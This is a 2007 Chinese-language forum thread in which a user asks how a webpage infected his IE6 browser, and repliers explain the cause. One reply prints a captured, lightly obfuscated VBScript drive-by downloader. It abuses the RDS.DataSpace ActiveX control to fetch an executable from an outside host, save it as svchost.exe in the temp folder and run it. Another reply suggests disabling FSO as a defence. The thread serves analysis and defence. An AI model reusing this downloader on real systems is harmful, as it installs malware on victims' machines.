请高手分析一下这个网站用了IE的什么漏洞传播病毒的？

eastnofail 2007-08-02 07:24:28

今天google一个东西，然后开这个网页：http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
发现有点慢，鼠标也有点闪，好像在执行什么东西似的，心想坏了，于是赶紧按下复位键，没想到结果还是中招了，后来我查看了临时目录下的文件，发现打开该网页的时候，下载了一个BAT文件、一个vbs脚本和一个木马，vbs脚本负责运行该木马和批处理，我的浏览器（IE6 SP1）权限都是默认级别的，按道理远程用户是没有权限执行这些操作的，那么他能够把病毒下载到我的机器上并且执行，那就肯定是利用了什么漏洞，我用flashget把这个页面的源代码下载下来了，并且跟踪了里面的一些script，但是本人水平有限，目前还没有发现他们是如何利用漏洞的，所以在此请教各位一起帮忙分析一下，（纯属学习目的，本人极度痛恨制作木马病毒的这帮鸟人，明白原理之后也会知道怎么应付）。谢谢！

...全文

407 15 打赏收藏转发到动态举报

写回复

用AI写文章

15 条回复

切换为时间正序

请发表友善的回复…

发表回复

chaircat 2007-08-17

打赏
举报

ls的ls...
用的是这一个组件"BD96C556-65A3-11D0-983A-00C04FC29E36"
很经典的一个利用...

shuangbaby 2007-08-17

打赏
举报

可以禁用fso组件等措施来防御

shuangbaby 2007-08-17

打赏
举报

发一个我以前截获的一个病毒源代码：主要利用 adodb.stream、xmlhttp、fso等来下病毒并执行exe..

<html>
<body>
<script type="text/jscript">
function init () {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tcsafe = "http://www.123.com/1.exe" //这个是病毒
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripting.FileSystemObject"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
dd="Xa.BuildPath(Xa,X8)"
X8=dd
d1="Xb.BuildPath(Xb,X7)"
X7=d1
d2="Xc.BuildPath(Xd,X6)"
X6=d2
d3="Xd.BuildPath(Xf,X5)"
X5=d3
d4="Xe.BuildPath(Xg,X4)"
X4=d4
d5="Xf.BuildPath(Xh,X4)"
X3=d5
d6="Xg.BuildPath(Xi,X3)"
X2=d6
d7="Xh.BuildPath(Xg,X1)"
X1=d7
d8="Xi.BuildPath(Xk,X0)"
X0=d8
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
</body>
</html>

gameboy766 2007-08-17